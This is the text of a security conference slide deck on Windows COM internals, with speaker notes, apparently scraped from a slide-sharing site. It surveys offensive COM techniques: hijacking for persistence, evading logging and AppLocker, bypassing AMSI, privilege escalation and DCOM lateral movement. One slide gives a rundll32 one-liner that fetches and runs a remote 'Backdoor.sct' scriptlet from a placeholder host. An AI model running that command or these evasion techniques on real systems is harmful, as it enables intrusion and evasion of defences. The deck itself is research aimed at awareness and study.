More Related Content
Similar to Windows Operating System Archaeology (20)
Windows Operating System Archaeology
- 2. Who Are We? - Casey Smith (@subTee) - Mandiant Red Team - subt0x10.blogspot.com - Matt Nelson (@enigma0x3) - Operator and Security Researcher at SpecterOps - enigma0x3.net
- 3. Objectives For This Talk Foster curiosity & further research Provide references Call attention to the attack surface and capabilities
- 4. What Will We Discuss? COM Overview COM Research Methodology Malicious COM Tactics
- 6. COM Architecture and History - in 2 minutes ;-) What are COM components? COM components are cross-language classes backed by: DLL (Dynamic-Link Libraries) OCX (ActiveX controls) TLB (Type Libraries ) EXE (Executables) SCT ( XML files ) Location Transparency Principle
- 7. Example - COM Scriptlet XML XML Files - We use these for POC examples Registration Block
- 8. COM Object Type Registration To find a component when a program needs it, it is USUALLY registered What Registry keys are related to COM object registration? HKLM + HKCU HKCR
- 9. What registry entries are needed to register a COM object? https://blogs.msdn.microsoft.com/larryosterman/2006/01/11/what-registry-entries- are-needed-to-register-a-com-object/ Also XRef: Minimal COM object registration https://blogs.msdn.microsoft.com/larryosterman/2006/01/05/minimal-com-object- registration/
- 10. COM Object Type Resolution CLSID - GUID - {AAAA1111-0000-0000-0000-0000FEEDACDC} ProgID - String Monikers - “scriptlet:http://example.com/file.sct” GetObject - CreateObject Methods rundll32.exe javascript:"..mshtml,RunHTMLApplication ";a=GetObject('scriptlet:https://example.com/Backdoor.sct');a.Exec();close();
- 12. Registry Example
- 13. COM Registry Keys https://msdn.microsoft.com/en-us/library/windows/desktop/ms678477(v=vs.85).aspx Regsvr32.exe Regasm.exe Regsvcs.exe These tools usually handle the registration and registry key population for us.
- 14. Example Call To Create/Locate an Object
- 15. What does all this mean? COM Artifacts and details can be found in the registry. Usually...
- 17. Sample Objective: Execute .NET code inside Windows Scripting Host Without registering the COM object.
- 18. Registration-Free COM Activation Microsoft.Windows.ActCtx Object Attach a Manifest or Download ManifestURL Loads dll without registration. https://github.com/subTee/RegistrationFreeCOM
- 20. RegistrationHelper - Bypass via CScript.exe https://gist.github.com/subTee/631f859c7890316b7e9a880cf4a51500
- 22. In Memory Assembly Execution JScript/VBScript https://github.com/tyranid/DotNetToJScript This is Amazing! Executes a .NET assembly IN JSCRIPT This dramatically extends capabilities of COM Scriptlets No Dll On Disk. Works for .NET 2 and 3.5 Only
- 24. Methodology Examples Using Procmon to trace resolution
- 25. Example - There are DOZENS of these
- 26. Excavation Tools James Forshaw - OleViewDotNet - https://github.com/tyranid/oleviewdotnet Mark Russonovich - ProcMon - https://technet.microsoft.com/en- us/sysinternals/processmonitor RPCView - http://rpcview.org API Spy - http://www.rohitab.com/apimonitor
- 27. Malicious Tactics Overview Persistence COM Hijacking - Evasion Office Add-Ins Privilege Escalation Lateral Movement
- 28. Persistence via COM Hijacking Leveraging Per-User COM Objects, we can divert resolution to an object under our control. Registry Only Persistence “TreatAs” hijack COM handler hijacking (scheduled tasks) https://msdn.microsoft.com/en-us/library/windows/desktop/ms679737(v=vs.85).aspx https://github.com/subTee/OSArchaeology/blob/master/COM/TreatAsPersistence.reg https://enigma0x3.net/2016/05/25/userland-persistence-with-scheduled-tasks-and- com-handler-hijacking/
- 29. Persistence via COM Hijacking
- 31. Evasion Windows very often resolves COM objects via the HKCU hive first Find your favorite script that implements GetObject() or CreateObject() and hijack it. This allows you to instantiate your own code without exposing it via the command line.
- 32. Abusing WSH: VBScript Injection Leverage an existing, signed VBScript to run our code
- 33. C:WindowsSystem32Printing_Admin_Scriptsen-US pubprn.vbs For example: Windows printing script pubprn.vbs calls GetObject on a parameter we control. Can use this to execute a COM scriptlet
- 34. Example: Evade Command Line Logging slmgr.vbs instantiates Scripting.Dictionary via CreateObject(). Hijack that object to make it run your code
- 35. Source Code of Slmgr.vbs Default System File
- 36. Example: Evade Command Line Logging
- 37. This is also a clever way to bypass AppLocker ;-) Winrm.vbs
- 38. Bypass the AntiMalware Scan Interface (AMSI)
- 39. Malicious Office Add-ins Outlook, Excel etc. Rich API for persistence and C2 https://twitter.com/JohnLaTwC/status/836259629277421568 Outlook Rules Added Via COM Object https://gist.github.com/subTee/e04a93260cc69772322502545c2121c4 https://labs.mwrinfosecurity.com/blog/add-in-opportunities-for-office-persistence/
- 40. Privilege Escalation The COM Elevation Moniker - Resources -Execute Process in Another user’s session -Think Terminal Server or RDP etc…
- 41. COM - CVE-2017-0100 https://drive.google.com/file/d/0B5sMkPVXQnfPbXI0SVliV0tuU0U/view - James Forshaw
- 43. Lateral Movement - Leveraging DCOM objects with no explicit access or launch permissions set - Certain objects have interesting methods… https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application- com-object/ https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/
- 45. Conclusions
- 46. Hopeful outcomes of this talk. Foster curiosity & further research Provide references Call attention to the attack surface and capabilities
- 47. Closing Thoughts / Conclusions / Thanks Special Thanks to: David Mcguire & Jason Frank for their support of this research while we were working for them. James Forshaw - For answering our questions and COM research All of the former ATD members who provided feedback and improvements to our research!
Editor's Notes
- #2: Casey
- #3: Casey/Matt
- #4: Casey
- #5: Casey
- #6: Casey
- #7: Casey https://cansecwest.com/slides/2015/Smart_COM_Fuzzing_Auditing_IE_Sandbox_Bypass_in_COM_Objects-Xiaoning_li.pdf https://www.blackhat.com/docs/us-14/materials/us-14-Forshaw-Digging-For_IE11-Sandbox-Escapes.pdf COM Specification: http://www.daimi.au.dk/~datpete/COT/COM_SPEC/pdf/com_spec.pdf Windows COM Dependency/History/Origins James Forshaw’s talk at Troopers and Infiltrate
- #8: Casey Necessary For GetObject
- #9: Casey AppID, CLSID Explain HKCR vs hkcu/hklm
- #10: Casey
- #11: Casey https://blogs.msdn.microsoft.com/cristib/2012/10/31/how-com-works-how-to-build-a-com-visible-dll-in-c-net-call-it-from-vba-and-select-the-proper-classinterface-autodispatch-autodual-part12/ Be sure to reference script:http for Matt’s malicious demos
- #12: Casey Importance Of GetObject
- #13: Casey
- #15: Casey From COM Specification
- #16: Casey
- #17: Casey
- #19: Casey
- #21: Casey
- #22: Casey (maybe add arrows)
- #23: Casey
- #25: Matt Resolution fails as well
- #26: Matt (reference treatas)
- #27: Casey/Matt
- #28: Matt
- #29: Matt http://www.nobunkum.ru/analytics/en-com-hijacking https://blog.gdatasoftware.com/2014/10/23941-com-object-hijacking-the-discreet-way-of-persistence https://attack.mitre.org/wiki/Technique/T1122
- #30: Matt
- #31: Matt
- #32: Matt
- #33: Matt
- #34: Matt Source Code of pubprn.vbs Injectable args(1)
- #35: Matt
- #36: Matt Point out why that injection is possible. We can hijack the script at CreateObject - before the rest of the logic!
- #37: Matt
- #38: Matt
- #39: Matt
- #40: Matt
- #41: Casey https://msdn.microsoft.com/en-us/library/ms679687.aspx - COM Elevation Moniker https://bugs.chromium.org/p/project-zero/issues/detail?id=1021&can=1&q=&sort=-id%20-%20P0%20EoP Reference Julian n0pe_sleds write up once posted on using this trick to get DA. http://blog.inspired-sec.com/archive/2017/03/17/COM-Moniker-Privesc.html
- #42: Casey https://bugs.chromium.org/p/project-zero/issues/attachmentText?aid=262285 http://blog.inspired-sec.com/archive/2017/03/17/COM-Moniker-Privesc.html Windows HelpPane Elevation of Privilege Vulnerability - CVE-2017-0100 An elevation of privilege exists in Windows when a DCOM object in Helppane.exe configured to run as the interactive user fails to properly authenticate the client. An attacker who successfully exploited the vulnerability could run arbitrary code in another user's session. To exploit the vulnerability, an attacker would first have to log on to the system. An attacker could then run a specially crafted application that could exploit the vulnerability once another user logged in to the same system via Terminal Services or Fast User Switching. The update addresses the vulnerability by correcting how Helppane.exe authenticates the client. The following table contains links to the standard entry for each vulnerability in the Common Vulnerabilities and Exposures list: Vulnerability title CVE number Publicly disclosed Exploited Windows HelpPane Elevation of Privilege Vulnerability CVE-2017-0100 No No
- #43: Casey
- #44: Matt
- #45: Matt
- #48: Matt